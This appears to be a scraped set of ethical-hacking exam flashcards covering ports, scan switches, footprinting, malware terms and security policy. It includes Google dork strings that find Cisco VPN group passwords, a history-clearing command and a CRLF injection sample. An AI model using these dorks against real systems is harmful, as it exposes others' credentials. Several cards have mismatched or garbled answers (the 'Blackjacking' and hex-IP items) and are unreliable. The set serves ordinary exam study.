C) Hybrid attacks use a word list, substituting numbers and symbols in common places
Which of the following best describes a hybrid attack? A) Hybrid attacks make use of rainbow tables and a word list B) Hybrid attacks make use of two or more password cracking tools C) Hybrid attacks use a word list, substituting numbers and symbols in common places D) Hybrid attacks use two or more unedited word lists
B)Vulnerability
Which of the following best describes a weakness or error that can lead to a security compromise? A)Threat B)Vulnerability C)Threat agent D)Threat vector
Code designed to be run on the server
Which of the following best describes a web application?
B. BIA (Business Impact Analysis)
Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization? A. BCP B. BIA C. MTD D. DRP
A. It has few heavy security restrictions.
Which of the following best describes an intranet zone? A. It has few heavy security restrictions. B. A highly secured zone, usually employing VLANs and encrypted communication channels. C. A controlled buffer network between public and private. D. A very restricted zone with no users.
D) Intercepting traffic (MITM)
Which of the following best describes the purpose of the tool hunt? A) Footprinting B) Web application attack tool C) Vulnerability scanner D) Intercepting traffic (MITM)
A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources
Which of the following is a passive footprinting method? (Choose all that apply.) A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources C. Performing a ping sweep against the network range D. Sniffing network traffic through a network tap
A)Self-signed certificates
You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner? A)Self-signed certificates B)Online certificates C)Signed certificates D)X.509 certificates
C)Ecora Auditor Professional
You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements? A)Tenable Nessus Professional B)Active Network Security (Hping) C)Ecora Auditor Professional D)Network Mapper (Nmap)
C)Vulnerability assessment
You need to perform the following tasks: -Identify all resources on a target system. -Identify the potential threats to each resource on the system. -Determine a mitigation strategy to handle serious and likely threats. What is the name of this process? A)Social engineering B)System scanning C)Vulnerability assessment D)Penetration test
A. tcpdump -i eth0 -w my.log
You need to put the NIC into listening mode on your Linux box, capture packets, and write the results to a log file name my.log. How do you accomplish this with tcpdump? A. tcpdump -i eth0 -w my.log B. tcpdump -l eth0 -c my.log C. tcpdump /i eth0 /w my.log D. tcpdump /l eth0 /c my.log
D)Enable WPA on the WAP
You need to secure a wireless local area network (WLAN) without significantly reducing throughput or limiting the supported devices. Which implementation should provide the highest level of security? A)Create a VPN using OpenVPN B)Create a VPN using PPTP C)Enable WEP on the WAP D)Enable WPA on the WAP
C)PGP
You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using? A)3DES B)SHA-1 C)PGP D)RC4
D) 222.173.190.239
You receive a suspicious email and note the URL is pointing to 0xDE.0xBE.0xEF. If you enter the command ping 0xDE.0xAD.0BE.0xEF which IP address will resolve? A) 233.44.245.15 B) 222.87.57.238 C) 199.233.87.45 D) 222.173.190.239
Active banner grabbing Passive banner grabbing
______ involves sending specially crafted packets to remote systems and comparing responses to determine the OS. _____ involves reading error messages, sniffing network traffic, or looking at page extensions.
tiger team
a group of people, gathered together by a business entity, working to address a specific problem or goal.
Health Insurance Portability and Accountability Act (HIPAA)
addresses privacy standards with regard to medical information.
ARP Table
is a list of IP addresses and corresponding MAC addresses stored on a local computer
NetworkView
is a network discovery and management tool for Windows
Email tracking
is used to monitor the delivery of emails to an intended recipient
Scanning an entire subnet
nmap 192.168.1.0/24
Scan a single IP
nmap 192.168.1.100
GFI LanGuard
offers quality vulnerability and compliance scanning, as well as built-in patch management.
Well-known ports
port numbers 0 - 1023
XMAS scan
-sX
sniff traffic
A remote Trojan would be used to do all of the following except ___.
D. Open ports do not respond at all.
A team member runs an Inverse TCP scan. What is the expected return for an open port? A. Open ports respond with a SYN/ACK. B. Open ports respond with a RST. C. Open ports respond with a FIN. D. Open ports do not respond at all.
Script Kiddies
An unskilled hacker who compromises system by running scripts, tools, and software developed by real hackers
A network ID
192.168.5.1/24 an example of which kind of reserved IP address?
A broadcast address
192.168.6.255/24 an example of which kind of reserved IP address?
IPv6 loopback address
::1
collision domain
A domain composed of all the systems sharing any given physical transport media. Systems may collide with each other during the transmission of data.
B. LOCAL_System
A hacker successfully completes a buffer overflow attack on a default IIS installation running on an older Windows 2000 machine spawning a command shell, what privileges is the attack most likely now running with? A. Local administrator B. LOCAL_System C. IUSR_SYSTEMNAME D. Guest
buffer
A portion of memory used to temporarily store output or input data.
Computer Emergency Response Team (CERT)
Name given to expert groups that handle computer security incidents.
the design of the modern processor chips
Spectre and Meltdown are vulnerabilities found in ___ from AMD, ARM, and Intel
ACK (Acknowledgement)
TCP Flag, Acknowledges the receipt of a packet
URG (Urgent)
TCP Flag, Data contained in the packet should be processed immediately
RST (Reset)
TCP Flag, Resets a connection
PSH (Push)
TCP Flag, Sends all buffered data immediately
FIN (Finish)
TCP Flag, There will be no more transmissions
Telnet
This technique probes HTTP servers to determine the Server field in the HTTP response header
80. but on development servers ports 81 and 8080 are also used.
Which port number is commonly used for HTTP?
D. 514
Which port number is used by default for syslog? A. 21 B. 23 C. 69 D. 514
53
Which port number is used for DNS?
21
Which port number is used for FTP?
792
Which port number is used for ICMP?
137 138 139
Which port numbers are used for SMB?
161 and 162
Which port numbers are used for SNMP?
A. Full-connect
Which port-scanning method presents the most risk of discovery but provides the most reliable results? A. Full-connect B. Half-open C. Null scan D. XMAS scan
161 and 162
Which ports does SNMP use to function?
A)Gaining permission from concerned authorities
Which preliminary activity differentiates a penetration test performed by a white hat hacker and a gray hat hacker? A)Gaining permission from concerned authorities B)Gaining covert authorization from the government C)Gathering information without direct interaction with targets D)Gathering information from targets by any possible means
ipfwadm
Which program controls the packet filtering or firewall capabilities in Linux kernel versions 1.2.x and 2.0.x?
iptables
Which program replaced ipchains in Linux 2.4x?
ipchains
Which program replaced ipfwadm in Linux 2.2x?
Address Resolution Protocol (ARP)
Which protocol maps IP addresses to MAC addresses?
D) SMB
Which protocol usually listens on ports in the 137 to 139 range? A) Telnet B) Kerberos C) SNMP D) SMB
database
An organized collection of data.
web-based script
A Web shell is a ___ that allows access to a web server
history -c history -w
BASH Clearing the history
CNAME
Canonical naming allows aliases to a host
Contact e-mail
E-mail address of the person responsible for the zone file.
[location:]
Find information for a specific location
PTR
Map IP address to a hostname
UDP 137
NetBIOS Name Service (NBNS)
Promiscuous Policy
No restriction on usage of system resources
Proxy Browser for Android ProxyDroid NetShade
Proxy Tools for Mobile
ICMP Type 11 Code 0
The packet took to long to be routed to the destination the TTL expired
Auditing
The process of recording activity on a system for monitoring and later review.
TXT
Unstructured text records
Validate an email address
VRFY is used to do which of the following?
Layer 5 Session
X.225, SCP, ZIP, Etc. resides at what layer of the OSI model?
B) ICMP D) Nothing
A UDP scan can produce which two possible responses? (Choose Two) A) RST B) ICMP C) ACK D) Nothing
figure out the vulnerabilities the system posses carry out additional attacks
(Banner Grabbing) Identifying the OS used on the target host allows an attacker to ____ and the exploits that might work on a system to further ____.
Exploit
A breach of IT system security through vulnerabilities
UDP Port Closed
-If a UDP packet is sent to closed port, the system responds with ICMP port unreachable message -Spywares, Trojan horses, and other malicious applications use UDP ports
ICMP ping
-PI
No ping
-Po
Serial, slowest scan
-T0 -T1
UDP Port Open
-There is no three-way TCP handshake for UDP scan -The system does not respond with a message when the port is open
ACK scan
-sA
FIN scan
-sF
IDLE scan
-sI
SYN scan
-sS
TCP connect scan
-sT
asynchronous
1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.
RAT
A Trojan can include which of the following? A) RAT B) TCP C) Nmap D) Loki
Social engineering
A Trojan relies on ___ to be activated.
An SDK
A covert channel or backdoor may be detected using all of the following except ___. A) Nmap B) Sniffers C) An SDK D) Netcat
bit flipping
A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted
Two (Trigger and Payload)
A logic bomb has how many parts, typically?
Insert themselves into an active session
A man-in-the-middle attack is an attack where the attacking party does which of the following?
A. nmap -A IPAddress
A member of your team enters the following command: nmap -sV -sC -O -traceroute IPAddress Which of the following nmap commands performs the same task? A. nmap -A IPAddress B. nmap -all IPAddress C. nmap -Os IPAddress D. nmap -sA IPAddress
Unicast
A packet addressed for, and intended to be received by, only one host interface
Anycast
A packet addressed in such a way that any of a large group of hosts can receive it, with the nearest host (in terms of routing distance) opening it
Multicast
A packet that is addressed in such a way that multiple host interfaces can receive it
D. Passive
A pen test member has gained access to an open switch port. He configures his NIC for promiscuous mode and sets up a sniffer, plugging his laptop directly into the switch port. He watches traffic as it arrives at the system, looking for specific information to possibly use later. What type of sniffing is being practiced? A. Active B. Promiscuous C. Blind D. Passive E. Session
A. To possibly gather information about internal hosts used in the organization's e-mail system
A pen test team member sends an e-mail to an address that she knows is not valid inside an organization. Which of the following is the best explanation for why she took this action? A. To possibly gather information about internal hosts used in the organization's e-mail system B. To start a denial-of-service attack C. To determine an e-mail administrator's contact information D. To gather information about how e-mail systems deal with invalidly addressed messages
ICMP Type 8
A ping message, requesting an Echo reply.
Baseline
A point of reference used to mark an initial state in order to manage change.
Evades detection through rewriting itself
A polymorphic virus ____
copyright
A set of exclusive rights granted by the law of a jurisdiction to the author or creator of an original work, including the right to copy, distribute, and adapt the work.
business continuity plan (BCP)
A set of plans and procedures to follow in the event of a failure or a disaster--security related or not--to get business services back up and running.
certificate authority (CA)
A trusted entity that issues and revokes public key certificates. In a network, is a trusted entity that issues, manages, and revokes security credentials and public keys for message encryption and/or authentication. Within a public key infrastructure (PKI), works with registration authorities (RAs) to verify information provided by the requestor of a digital certificate.
This flag is set as an acknowledgment to SYN flag. This flag is set on all segments after the initial SYN flag.
ACK (Acknowledgment)
countermeasures
Actions, devices, procedures, techniques, or other measures intended to reduce the vulnerability of an information system.
assessment
Activities to determine the extent to which a security control is implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Push and pop
Adding to and removing from a program stack are known as what?
Africa
AfriNIC manages what areas?
D) A nmap scan with the -sO switch
After a network scan, very few conventional ports are discovered to be open. You decide you want to discover as many protocols on the sweep as possible. Which of the following is the best choice for your port scan? A) A nessus sweep of the subnet B) A nmap scan with the -sP switch C) A nmap scan with the -se switch D) A nmap scan with the -sO switch
Common Internet File System/Server Message Block
An Application layer protocol used primarily by Microsoft Windows to provide shared access to printers, files, and serial ports. It also provides an authenticated interprocess communication mechanism.
Local configuration of an internal router by an internal administrative workstation
An administrator is configuring a network intrusion detection system (IDS). Audit rules need to be configured so that only malicious activities and policy violations are detected and logged. Which of these scenarios should you NOT add as an audit rule? A)Local configuration of an internal router by an internal administrative workstation B)Remote access of an external router from a known IP address in a blacklist database C)Remote configuration of an internal router by an unknown external laptop D)Local access of an internal router from an unknown IP address not in an employee database
An obvious method to use a system
An overt channel is ___?
Single loss Expectancy (SLE) x Annual Rate of Occurrence (ARO)
Annualized Loss Expectancy (ALE) = what?
are services on the Internet that make use of a web proxy to hide your identity.
Anonymizers
ICMP Type 0
Answer to a Type 8 Echo Request.
alter the launch daemon's
Attacker can ___ executable to maintain persistence or to escalate privileges
web-stat Alexa Monitis
Attacker uses website traffic monitoring tools such as ______, etc. to collect the information about target company.
installs reverse HTTP shell
Attackers ___ on victim's machine, which is programmed in such a way that it would ask for commands to an external master who controls the reverse HTTP shell
exploit software vulnerabilities
Attackers ____ by taking advantage of programming flaws in a program, service, or within the operating system software or kernel to execute malicious code
execute malicious code
Attackers alter plist files to ___ on behalf of a legitimate user to escalate privileges
Audit data
Chronological record of system activities to enable the reconstruction and examination of the sequence of events and changes in an event.
filetype:pcf"cisco" "GroupPwd"
Cisco VPN files with Group Passwords for remote access
CSMA/CD (collision detection) CSMA/CA (collision avoidance)
Collisions within a collision domain can be managed by ___ or ___.
clear text
Community strings are transmitted in ____ in SNMPv1
CAM table
Content addressable memory table. Holds all the MAC-address-to-port mappings on a switch.
"Config" intitle:"Index of" intext:vpn
Directory with keys of VPN servers
info:string example: info:www.anycomp.com
Displays information Google stores about the page itself
link:string
Displays linked pages based on a search term.
[cache:]
Displays the web pages stored in the Google cache
1. Check for live systems 2. Check for open ports 3. Scan beyond IDS 4. Perform banner grabbing 5. Scan for vulnerabilities 6. Draw network diagrams 7. Prepare proxies
EC-Council's scanning methodology phases include the following steps:
C. Hashing
Elements of security include confidentiality, integrity, and availability. Which technique provides for integrity? A. Encryption B. UPS C. Hashing D. Passwords
eMailTrackerPro PoliteMail Yesware ContactMonkey Zendio ReadNotify DidTheyReadIt Trace Email
Email Tracking Tools
track an email and extract information
Email tracking tools allow an attacker to ____ such as sender identity, mail server, sender's IP address, location, etc.
A. FISMA
Enacted in 2002, this U.S. law requires every Federal agency to implement information security programs, including significant reporting on compliance and accreditation. Which of the following is the best choice for this definition? A. FISMA B. HIPAA C. NIST 800-53 D. OSSTM
Engineer's Toolset SNMPScanner OpUtils 5 SNScan
Enumerate with SNMP tools:
identify any vulnerable services
Enumerating RPC endpoints enable attackers to ___ on these service ports
PsTools
Enumerating user accounts using ___ suite helps to control and manage remote systems from the command line
ICMP Type 3 Code 13
Error message - Communication administratively prohibited
ICMP Type 3 Code 1
Error message - Destination host unreachable
ICMP Type 3 Code 0
Error message - Destination network unreachable
Vulnerability
Existence of a weakness, design, or implementation error that can lead to an unexpected event compromising the security of the system
"." Root .gov, .com, .net, .org Top Level-"Parent Domain" microsoft.com, google.com Second Level-"Child Domain" www.anyname.com Third Level-Hosts and Rsources
Explain DNS structure.
Domain Dossier DNS Lookup
Extracting DNS Information
Folder Steganography
Files are hidden and encrypted within a folder and do not appear to normal Windows applicaiton, including Windows Explorer
Netcraft
Find restricted URLs or operating systems (OS) can be found using what? also has a toolbar add-on for Firefox and Chrome
ARIN whois database search
Find the range of IP addresses using ______
"[main]" "enc_GroupPwd=" ext:txt
Finds Cisco VPN client passwords (encrypted, but easily cracked)
Inurl:/remote/login?lang=en
Finds ForiGate Firewall's SSL-VPN login portal
GiliSoft File Lock Pro Folder Lock Hide Folders 5 WinMend Folder Hidden Invisible Secrets 4 Max Folder
Folder Steganography Tools
Google Yahoo! Search Ask Bing Dogpile
Footprint search engines such as ___ , etc. to gather target organization's information such as employee details, login pages, intranet portals, etc. that helps in performing social engineering and other types of advanced system attacks
reduces the attacker's focus area
Footprinting ___ to a specific range of IP addresses, networks, domain names, remote access, etc.
draw a map or outline
Footprinting allows attackers to ____ the target organization's network infrastructure to know about the actual environment that they are going to break
Hoovers LexisNexis Business Wire
Gather competitive intelligence using tools such as ___ , etc.
public network information system information personal information
Groups, forums, and blogs provide sensitive information about a target such as ______
Algorithms
Hide data in mathematical functions used in compression algorithms
C) He cannot spoof his IP and successfully use TCP
Hijacking BlackBerry communications is referred to as "Blackjacking". Which of the following tools is used in this effort? A) The firewall is blocking telnet traffic B) Port 23 is not the correct port for telnet C) He cannot spoof his IP and successfully use TCP D) The target is most likely a honeypot
Malware attacks Footprinting Password attacks Denial-of-Service attacks Arbitrary code execution Unauthorized access Privilege escalation Backdoor attacks Physical security threats
Host Threats
By ping scanning very slowly
How can a hacker take advantage of alert threshold settings to avoid detection?
more ~/.bash_history
How can you view the BASH saved command history?
Scan entire subnet for live host
Hping Commands: hping3 -1 10.0.1.x --rand-dest -I eth0
UDP scan on port 80
Hping Commands: hping3 -2 10.0.0.25 -p 80
IDLE Scan: Step 3
IPID Probe SYN+ACK Packet --> (zombie) <-- Response: IPID=31339 RST Packet IPID incremented by 2 since step 1, so port 80 must be open
IDLE Scan: Step 1
IPID Prove SYN+ACK Packet --> (zombie) <-- Response: IPID=31337 RST Packet
TTL Expired
If a packet capture device show the packet as Type 11, Code 0 what does it mean?
Administratively Blocked
If a packet capture device show the packet as Type 3, Code 13 what does it mean?
nbtstat -A IPADDRESS
If you want to bring up a remote system table using NetBIOS.
eavesdropping shoulder surfing dumpster divingf
Implement social engineering techniques such a ____ that may help to gather more critical information about the target organization
setuid setgid
In Linux and MacOS, if an application uses ___ or ___ then the application will execute with the privileges of the owning user or group
FIN URG PSH
In Xmas scan, attackers send a TCP frame to a remote device with ___ flags set
asymmetric algorithm
In computer security, an algorithm that uses separate keys for encryption and decryption.
active passive
In enumeration, ___ OS fingerprinting involves sending crafted, nonstandard packets to a remote host and analyzing the replies. ____ OS fingerprinting involves sniffing packets without injecting any packets into the network--examining things like Time-to-Live (TTL), window sizes, Don't Fragment (DF) flags, and Type of Service (ToS) fields from the capture.
access control lists
In networking, ____ are commonly associated with firewall and router traffic-filtering rules.
collision
In regard to hash algorithms, occurs when two or more distinct inputs produce the same output.
attacker
In source routing, the ___ makes some or all of these decisions on the router
Port number
In the command telnet 192.168.5.5 23, what does the number 23 stand for?
Where messages are routed through multiple intermediaries
In what scenarios should end-to-end security mechanisms like XMLEncryption, XMLSignature, and SAML assertions be used?
Spear phishing
In what type of attack does the attacker send high-level personnel an email that appears to come from an individual who might reasonably request confidential information, but the email includes a bogus link?
Social engineering
In what type of attack does the attacker use believable language to attempt to gain confidential information, especially login credentials, from personnel?
Penetration testing
In which CEH hacking stage do try to break the security of the system?
Scanning/Enumeration
In which phase of an attack does discovery of live hosts, access points, accounts and policies, and vulnerability assessment occur?
Reconnaissance
In which phase of an attack does information gathering, physical and social engineering, and locating network ranges occur?
Clearing Tracks
In which phase of an attack is the record of the attack wiped or obscured?
D. Maintaining access
In which phase of the attack would a hacker set up and configure "zombie" machines? A. Reconnaissance B. Covering tracks C. Gaining access D. Maintaining access
SDA
Indicate authority for domain
Cyber Terrorists
Individuals with wide range of skills, motivated by religious or political beliefs to create fear by large-scale disruption of computer networks
Gather personal information that assists to perform social engineering
Information obtained from WHOIS database assists an attacker to:
active fingerprinting
Injecting traffic into the network to identify the operating system of a device
Footprinting
Is the process of collecting as much information as possible about a target network, for identifying various ways to intrude into an organization's network system
Hack Value
It is the notion among hackers that something is worth doing or is interesting
NetScanToolsPro
It lists IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automaticially or manually (using manual tools)
Open Source Security Testing Methodology Manual (OSSTM)
It's a peer-reviewed formalized methodology of security testing and analysis that can "provide actionable information to measurably improve your operational security."
www.archive.org Google Cache
Keeps snapshots of sites from days gone by:
Amac Keylogger Elite Keylogger Auto Mac OS X KeyLogger KidLogger for MAC Perfect Keylogger for Mac MAC Log Manager
Keyloggers for Mac
All In One Keylogger Spyrix Personal Monitor SoftActivity Activity Monitor Elite Keylogger Keylogger Spy Monitor Micro Keylogger
Keyloggers for WindowsQ
Latin America and the Caribbean.
LACNIC manages what areas?
Query a database
LDAP is used to perform which function?
port 389
LDAP sessions are started by a client on TCP ____ connecting to a Directory System Agent (DSA).
Physical
Layer 1 of OSI model
Data Link
Layer 2 of OSI model
Data Link layer
Layer 2 of the OSI reference model. This layer provides reliable transit of data across a physical link. Is concerned with physical addressing, network topology, access to the network medium, error detection, sequential delivery of frames, and flow control. Is composed of two sublayers: the MAC and the LLC.
Network
Layer 3 of OSI model
Transport
Layer 4 of OSI model
Security (Restrictions), Functionality (Features), Usability (GUI)
Level of security in any system can be defined by the strength of three components of this triangle.
[related:]
Lists web pages that are similar to a specified web page
[link:]
Lists web pages that have links to the specified web page
asymmetric
Literally, "not balanced or the same." In computing, ___ refers to a difference in networking speeds upstream to downstream. In cryptography, it's the use of more than one key for encryption/authentication purposes.
D)Smart cards
Management at your organization has asked you to implement an access control mechanism that uses Extensible Authentication Protocol (EAP). Which mechanism should you implement? A)Biometrics B)Access control lists (ACLs) C)Complex passwords D)Smart cards
A)Active
Management has increasingly become concerned about sniffing attacks. Which type of sniffing involves launching an ARP spoofing or traffic-flooding attack? A)Active B)Passive C)Promiscuous D)Broadcast
Metagoofil ExtractMetadata FOCA Meta Tag Analyzer BuzzStream Analyze Metadata Exiftool
MetaData Extraction Tools
TCP/UDP 135
Microsoft RPC Endpoint Mapper
Internet Security Association and Key Management Protocol (ISAKMP)
Most IPsec based VPNs use ____ , a part of IKE, to establish, negotiate, modify, and delete Security Associations (SA) and cryptographic keys in a VPN environment
80 25
Most network servers listen on TCP ports, such as web servers on port ___ and mail servers on port ___. Port is considered "open" if an application is listening on the port
Web Mirroring Tools
NCollector Studio Teleport Pro Portable Offline Browser Website Ripper Copier Gnu Wget HTTrack Web Site Copier
Alternate Data Streams
NTFS has a feature call as ___ that allows attackers to hide a file behind other normal files
TCP 139
NetBIOS Session Service (SMB over NetBIOS)
<1C> UNIQUE
NetBIOS code and type for Domain controller.
<1B> UNIQUE
NetBIOS code and type for Domain master browser.
<00> GROUP
NetBIOS code and type for Domain name
<00> UNIQUE
NetBIOS code and type for Hostname
Net Master Scany Network "Swiss-Army-Knife"
Network Discovery Tools for Mobile
Network Topology Mapper OpManager NetworkView The Dude Switch Center Enterprise LANState InterMapper Friendly Pinger NetMapper Ipsonar NetBrain Enterprise Suite WhatsConnected Spiceworks-Network Mapper
Network Discovery and Mapping Tools
Nmap
Network administrators can use __ for network inventory, managing service upgrade schedules, and monitoring host or service uptime
number of packets sent
OS increments the IPID for each packet sent, thus probing an IPID gives an attacker the ___ since last probe.
legislative (government regulations) contractual (industry or group requirements) standards based (practices that must be followed in order to remain a member of a group or organization)
OSSTM defines three types of compliance for testing: ___, ___, ___.
Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map
Objectives of Footprinting
A)SNScan
One of your company's IT technicians provides you with a report that that lists SNMP-enabled devices on a network. Which tool most likely provided this information? A)SNScan B)Foundstone C)Ecora D)NetBus
Anonymizers for Mobile
Orbot Psiphon OpenDoor
DNSstuff DNS Records
Perform DNS footprinting using tools such as ___, etc. to determine key hosts in the network and perform social engineering attacks
GHDB MeaGoofil SiteDigger
Perform Google hacking using tools such as ___ etc.
first layer of protection
Physical security is the ______ in any organization
console port
Physical socket provided on routers and switches for cable connections between a computer and the router/switch. This connection enables the computer to configure, query, and troubleshoot the router/switch by use of a terminal emulator and a command-line interface.
Combining pings to every address within a range
Ping sweep or ICMP Echo scanning
RPC (TCP)
Port number 135
NetBIOS (TCP, UDP)
Port number 137 - 139
IMAP (TCP)
Port number 143
SNMP (UDP)
Port number 161/162
BGP
Port number 179
FTP (TCP)
Port number 20, 21
[info:]
Presents some information that Google has about a particular web page
Stateful Firewall is Present (ACK Flag Probe)
Probe Packet (ACK) --> <-- No Response
No Firewall (ACK Flag Probe)
Probe Packet (ACK) --> <-- RST
Port is closed (Inverse TCP Flag Scanning)
Probe Packet (FIN/URG/PSH/NULL) --> <-- RST/ACK
User
RID -1000 and up
Administrator
RID -500
Guest
RID -501
Europe, Middle East, and parts of Central Asia/Northern Africa.
RIPE manages what areas?
This flag forces a termination of communications (in both directions)
RST (Reset)
Prevent hackers Uncover vulnerabilities Strengthen an organization's security posture
Reasons why organizations recruit ethical hackers
C)Databases
Recently you discovered that several of your company's computers have experienced SQL injection attacks. Which specific entity is attacked? A)Routers B)Firewall C)Databases D)Web servers
ICMP Type 5 Code 1
Redirect datagram for the host
ICMP Type 5 Code 0
Redirect datagram for the network
Website footprinting
Refers to monitoring and analyzing the target organizations website for information
Clearing Tracks or Covering Tracks
Refers to the activities carried out by an attacker to hide malicious acts
Authenticity
Refers to the characteristics of a communication, document or any data that ensures the quality of being genuine
Maintaining Access
Refers to the phase when the attacker tries to retain his or her ownership of the system
Gaining Access
Refers to the point where the attacker obtains access to the operating system or application on the computer or network
Scanning
Refers to the pre-attack phase when the attacker scans the network for specific information on the basis of information gathered during reconnaissance
Reconnaissance
Refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching an attack
ARIN AFRINIC RIPE LAC APNIC
Regional Internet Registries (RIRs)
remotely installs applications, executes programs/scripts
RemoteExec ___, and updates files and folders on Windows system throughout the network
RP
Responsible person
[intitle:]
Restricts the results to documents containing the search keyword in the title
[site:]
Restricts the results to those websites in the given domain
[allinurl:]
Restricts the results to those with all of the search keywords in the URL
UDP/TCP ports 2000, 2001, 5050, 5061
SIP service generally uses what ports?
TCP/UDP 445
SMB over TCP (Direct Host)
RCPT TO
SMTP (Simple Mail Transfer Protocol) command to define recipients.
EXPN
SMTP (Simple Mail Transfer Protocol) command to provide the actual delivery addresses of mailing lists and aliases.
VRFY
SMTP (Simple Mail Transfer Protocol) command to validate users.
Send email messages
SMTP is used to perform which function?
Three-way handshake
SYN SYN/ACK ACK
IDLE Scan: Step 2 (Port Closed)
SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- RST
intitle:string example: intitle: login example: allintitle:login password
Searches for pages that contain the string in the title.
filetype: example: filetype:doc
Searches only for files of a specific type (DOC, XLS, and so on).
IPsec
Session hijacking can be performed on all of the following protocols except which one? FTP SMTP HTTP IPsec
Authentication
Session hijacking can be thwarted with which of the following? SSH FTP Authentication Sniffing
RedirectEXE injectDLL GetProcAddress
Shims like ___ can be used by attackers to escalate privileges, install backdoors, disable Windows defender, etc.
related:webpagename
Shows web pages similar to webpagename.
TCP 25
Simple Mail Transfer Protocol (SMTP)
UDP 161
Simple Network Management Protocol (SNMP)
gives attackers full access to your system
Sirefef Rootkit or ZeroAccess ___ while using stealth techniques in order to hide its presence from the affected device
altering the internal processes
Sirefef hides itself by ___ on an operating system so that your anitvirus and anti-spyware can't detect it
Phishing
Social engineering can be used to carry out email campaigns known as _____?
Human nature Technology People Physical
Social engineering preys on many weaknesses including _____
SEC Info (www.secinfo.com) Experian (www.experian.com) Market Watch (www.marketwatch.com) Wall Street Monitor (www.twst.com) Euromonitor (www.euromonitor.com)
Some websites for competitive intelligence. Company plans and financials.
EDGAR Databse (www.sec.gov/edgar.shtml) Hoovers (www.hoovers.com) LexisNexis (www.lexisnexis.com) Business Wire (www.businesswire.com)
Some websites for competitive intelligence. Information on company origins and how it developed over the years can be found in places like:
Authenticity
Sometimes included as a security element, refers to the characteristic of data that ensures it is genuine.
establishes a full connection
TCP Connect scan ___ and tears it down by sending a RST packet
super user privileges
TCP Connect scan does not require ___
SYN (Synchronize)
TCP Flag, Initiates a connection between hosts
Layer 4 Transport
TCP, UDP resides at what layer of the OSI model?
Anonymizers
Tails G-Zapper Proxify Guardster Psiphon Spotflux Anonymous Web Surfing Tool Ultrasurf Hide Your IP Address Head Proxy Anonymizer Universal Hope Proxy
live operating system
Tails is a _____, that user can start on any computer from a DVD, USB stick, or SD card.
public
The ___ community string is used for read-only searches.
NTLMv2 hash
The attacker cracks the ____ obtained from the victim's authentication process
Tcpdump
The command-line equivalent of Win Dump is known as what?
Authorization
The conveying of official access or legal power to a person or entity.
Security target (ST)
The documentation describing the TOE (Target of evaluation) and security requirements
organizational unique identifier (OUI)
The first half of the MAC address, consisting of 3 bytes (24 bits), is known as the ____ and is used to identify the card manufacturer.
Gray hats
The hardest group to categorize, these hackers are neither good nor bad.
Internet and other publicly accessible sources
The pen tester attempts to gather as much information as possible about the target organization from the _____
Authentication
The process of determining whether a network entity (user or service) is legitimate--usually accomplished through a user ID and password.
cryptography
The science or study of protecting information, whether in transit or at rest, by using techniques to render the information unusable to anyone who does not possess the means to decrypt it.
Asynchronous transmission
The transmission of digital signals without precise clocking or synchronization
Password Policy
This defines everything imaginable about passwords within the organization, including length, complexity, maximum and minimum age, and reuse.
Information Protection Policy
This defines information sensitivity levels and who has access to those levels. It also addresses how data is stored, transmitted, and destroyed.
Access Control Policy
This identifies the resources that need protection and the rules in place to control access to those resources
ICMP Echo Scanning
This is not really port scanning, since ICMP does not have a port abstraction. But it is sometimes useful to determine which hosts in a network are up by pinging them all
PTR (Pointer)
This maps an IP address to a hostname (providing for reverse DNS lookups).
Special-Access Policy
This policy defines the terms and conditions of granting special access to system resources
SRV (Service)
This record defines the hostname and port number of servers providing specific services, such as a Directory Services server.
IDLE
This uses a spoofed IP address (zombie system) to elicit port responses during a scan.
risk assessment approach
Threat modeling is a ____ for analyzing security of an application by capturing, organizing, and analyzing all the information that affects the security of an application
A)CRLF injection
Through a company website, customers use a standard HTML form to submit service requests to the web server. The web server in turn creates an SMTP email and sends it on to a customer support email address. The HTML form receives the following subject line: Email is not working<CR><LF>Bcc: [email protected] Which type of attack is being attempted? A)CRLF injection B)Session splicing C)XSS D)Email spoofing
A)Throttling
To prevent DoS attacks, you set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for a server to process. What is this process referred to? A)Throttling B)Filtering C)QoS D)Clustering
Phishing Tailgating/Piggybacking
Training and education of end users can be used to prevent _____
When this flag is set, it indicates the data inside is being sent out of band. Cancelling a message mid-stream is one example.
URG (Urgent)
Layer 1 Physical
USB Standards, Bluetooth, Etc. resides at what layer of the OSI model?
bluesnarfing
Unauthorized access to information such as a calendar, contact list, e-mails, and text messages on a wireless device through a Bluetooth connection.
determine the OS
Use the Netcraft tool to _____ in use by the target organization.
Netcraft tool
Use the ___ to determine the Operating Systems in use by the target organization
HTTP GET commands
Victim here will act as a web client who is executing ___ whereas the attacker behaves like a web server and responds to the requests (Covering Tracks on Network Using Reverse HTTP Shells)
Denial-of-Service (DoS) Session Hijacking Caller ID spoofing Eavesdropping Spamming over Internet Telephoney (SPIT) VoIP phishing (Vishing)
VoIP enumeration information can be used to launch various VoIP attacks such as ____
SIP (Session Initiation Protocol)
VoIP uses ___ protocol to enable voice and video calls over an IP network
National Vulnerability Database (nvd.nist.gov) Securitytracker (www.securitytracker.com) Hackerstorm Vulnerability Database Tool (www.hackerstorm.com) Security-Focus (www.securityfocus.com)
Vulnerability research should include looking for the latest exploit news, any zero-day outbreaks in viruses and malware, and what recommendations are being made to deal with them. What are some tools to help with this?
DNS Tools UltraTools Mobile Whois Lookup Tool
WHOIS Lookup Tools for Mobile
A backdoor
What is a covert channel?
Ability to filter for packet fragments
What is the main improvement of ipchains over ipfwadm?
Insider affiliate
